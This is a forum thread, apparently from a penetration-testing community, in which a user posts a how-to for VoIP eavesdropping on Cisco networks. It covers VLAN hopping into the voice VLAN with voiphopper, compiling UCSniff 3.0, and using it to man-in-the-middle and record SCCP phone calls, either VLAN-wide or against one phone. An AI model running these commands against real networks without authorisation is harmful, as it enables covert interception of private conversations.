BT4 + EEE 701 + VLAN Hopping + UCSniff 3.0

[ecks90]

Hey guys,

First time posting here.

UCSniff 3.0 was released today, ahead of schedule. I had been hanging out for this for the --garpdb option to disable GARP when sniffing Cisco SCCP packets.

I have written up a small how-to using voiphopper + ucsniff on my EEE 701. I have written this on my blog (nothing fancy), hope its ok to link here.

x90 Blog

Thanks.

//edit full howto

Create persistent BT4 on USB
Followed the directions outlined here:

• Backtrack 4 – USB/Persistent Changes/Nessus | Infosec Ramblings

VLAN Support + VLAN Hopping
Firstly modprobe to enable VLAN tagging in the environment

Code:

modprobe 8021q

Connect to a cisco switchport with a similar switch config

Code:

switchport mode access
switchport access vlan 10
switchport voice vlan 20

Try VLAN hopping with voiphopper

Code:

voiphopper -i eth0 -c 0

Download and compile UCSniff 3.0
Download UCSniff here:

• UCSniff IP Video Sniffer

Compiling

Code:

tar zxvf ucsniff-3.01.tar.gz
cd ucsniff-3.01
./configure
make
make install

MiTM SCCP
To record all SCCP conversations on the voice VLAN

Code:

ucsniff -i eth0.20 --garpdb // //

Or to target a particular IP phone, without enumerating the targets on the voice VLAN first

Code:

ucsniff -i eth0.20 --garpdb /XXXX.XXXX.XXXX.XXXX/ //

Finally play back the file from the commandline

Code:

play filename.mp3

[Archangel-Amael]

Welcome to the forums.
It would be nice, maybe better if you were to make a copy of the tutorial here for others to read.

EDIT: Much better ecks90. Fixed the links for you too.